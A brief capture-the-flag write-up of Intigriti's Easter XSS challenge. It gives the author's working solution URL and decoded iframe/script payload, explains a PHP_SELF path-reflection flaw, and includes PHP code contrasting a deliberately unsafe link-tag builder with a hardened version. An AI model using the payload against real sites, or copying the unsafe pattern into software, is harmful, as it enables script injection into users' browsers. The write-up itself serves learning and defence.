Intigriti easter XSS challenge
Solution
My solution to Intigriti’s XSS challenge is:
https://challenge.intigriti.io/#../index.php/lolmandiceme
The decoded payload after the fragment looks something like this:
#../index.php/lolman"><iframe srcdoc="<script src="/lol';alert(document.domain);-'"></script>">/diceme
One interesting thing to note is that most people used the reflection in the 403 page when files starting with .ht were blocked, whereas I used the reflection from PHP's weird path handling.
As per the norm, requests to /index.php and /index.php/anything/random are both routed to /index.php, but a request to /index.php/haxed/me ended up reflecting haxed in one of the link tags in the response. The backend probably used PHP's basename($_SERVER['PHP_SELF']) to output the link tags, leading to the issue.
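The path reflection described above, shown as a weak form beside a hardened one. This is an added example, not the challenge's code or the author's. Assumptions: the `$_SERVER` arrays are constructed stand-ins, the `canonical` link tag and both function names are hypothetical, and the marker in the third path is a harmless constructed value.

```php
<?php
declare(strict_types=1);

// Constructed stand-ins for $_SERVER. With PATH_INFO routing, PHP_SELF is
// SCRIPT_NAME plus whatever extra path the client appended; SCRIPT_NAME is
// only the script that was actually routed to.
$requests = [
    ['SCRIPT_NAME' => '/index.php', 'PHP_SELF' => '/index.php'],
    ['SCRIPT_NAME' => '/index.php', 'PHP_SELF' => '/index.php/anything/random'],
    ['SCRIPT_NAME' => '/index.php', 'PHP_SELF' => '/index.php/haxed"><i>'],
];

// Weak (assumed shape of the backend): a client-controlled path segment is
// written into a quoted attribute without encoding.
function linkTagWeak(array $server): string
{
    return '<link rel="canonical" href="' . basename($server['PHP_SELF']) . '">';
}

// Hardened: derive the name from SCRIPT_NAME, which ignores the appended
// path, and HTML-encode it for a quoted attribute anyway.
function linkTagHardened(array $server): string
{
    $name = basename($server['SCRIPT_NAME']);
    return '<link rel="canonical" href="'
        . htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">';
}

// Print both renderings for each constructed request so the difference in
// the third case (attribute closed early vs. fixed script name) is visible.
foreach ($requests as $server) {
    echo 'PHP_SELF: ', $server['PHP_SELF'], PHP_EOL;
    echo '  weak:     ', linkTagWeak($server), PHP_EOL;
    echo '  hardened: ', linkTagHardened($server), PHP_EOL;
}
```

Where the appended path really is needed in the page, encoding it with `htmlspecialchars` at the point of output is the control that matters; switching to `SCRIPT_NAME` only removes the client-controlled part.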
Overall, the challenge was pretty unique and I applaud Intigriti for coming up with it.